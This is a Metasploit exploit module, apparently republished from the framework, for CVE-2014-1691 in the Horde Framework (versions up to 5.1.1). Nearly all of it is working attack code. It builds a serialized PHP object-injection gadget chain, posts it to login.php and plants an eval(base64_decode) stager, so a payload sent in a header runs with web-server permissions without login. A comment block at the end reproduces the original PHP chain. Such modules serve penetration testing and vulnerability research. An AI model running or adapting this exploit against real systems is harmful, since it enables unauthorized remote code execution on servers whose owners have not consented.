Horde Framework Unserialize PHP Code Execution
Source: metasploit.com  Author: EgiX  Published: 2014-03-21
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Horde Framework Unserialize PHP Code Execution',
      'Description'    => %q{
        This module exploits a PHP unserialize() vulnerability in Horde <= 5.1.1 which could be
        abused to allow unauthenticated users to execute arbitrary code with the permissions of
        the web server. The dangerous unserialize() exists in the 'lib/Horde/Variables.php' file.
        The exploit abuses the __destruct() method from the Horde_Kolab_Server_Decorator_Clean
        class to reach a dangerous call_user_func() call in the Horde_Prefs class.
      },
      'Author'         =>
        [
          'EgiX', # Exploitation technique and Vulnerability discovery (originally reported by the vendor)
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-1691' ],
          [ 'URL', 'http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection' ],
          [ 'URL', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=737149' ],
          [ 'URL', 'https://github.com/horde/horde/commit/da6afc7e9f4e290f782eca9dbca794f772caccb3' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Targets'        => [ ['Horde 5', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 27 2013'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "The base path to Horde", "/horde/"])
        ], self.class)
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = send_request_exploit("print #{flag};die;")
    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("#{peer} - Testing injection...")
    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...")
    end

    print_status("#{peer} - Exploiting the unserialize()...")
    send_request_exploit(payload.encoded)
  end

  def send_request_exploit(p)
    php_injection = "eval(base64_decode($_SERVER[HTTP_CMD]));die();"

    payload_serialized = "O:34:\"Horde_Kolab_Server_Decorator_Clean\":2:{s:43:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_server\";"
    payload_serialized << "O:20:\"Horde_Prefs_Identity\":2:{s:9:\"\x00*\x00_prefs\";O:11:\"Horde_Prefs\":2:{s:8:\"\x00*\x00_opts\";a:1:{s:12:\"sizecallback\";"
    payload_serialized << "a:2:{i:0;O:12:\"Horde_Config\":1:{s:13:\"\x00*\x00_oldConfig\";s:#{php_injection.length}:\"#{php_injection}\";}i:1;s:13:\"readXMLConfig\";}}"
    payload_serialized << "s:10:\"\x00*\x00_scopes\";a:1:{s:5:\"horde\";O:17:\"Horde_Prefs_Scope\":1:{s:9:\"\x00*\x00_prefs\";a:1:{i:0;i:1;}}}}"
    payload_serialized << "s:13:\"\x00*\x00_prefnames\";a:1:{s:10:\"identities\";i:0;}}s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"

    send_request_cgi(
      {
        'uri'    => normalize_uri(target_uri.path.to_s, "login.php"),
        'method' => 'POST',
        'vars_post' => {
          '_formvars' => payload_serialized
        },
        'headers' => {
          'Cmd' => Rex::Text.encode_base64(p)
        }
      })
  end
end

=begin
PHP chain by EgiX: http://karmainsecurity.com/exploiting-cve-2014-1691-horde-framework-php-object-injection

class Horde_Config
{
    protected $_oldConfig = "phpinfo();die;";
}

class Horde_Prefs_Scope
{
    protected $_prefs = array(1);
}

class Horde_Prefs
{
    protected $_opts, $_scopes;

    function __construct()
    {
        $this->_opts['sizecallback'] = array(new Horde_Config, 'readXMLConfig');
        $this->_scopes['horde'] = new Horde_Prefs_Scope;
    }
}

class Horde_Prefs_Identity
{
    protected $_prefs, $_prefnames;

    function __construct()
    {
        $this->_prefs = new Horde_Prefs;
        $this->_prefnames['identities'] = 0;
    }
}

class Horde_Kolab_Server_Decorator_Clean
{
    private $_server, $_added = array(1);

    function __construct()
    {
        $this->_server = new Horde_Prefs_Identity;
    }
}

$popchain = serialize(new Horde_Kolab_Server_Decorator_Clean);
=end
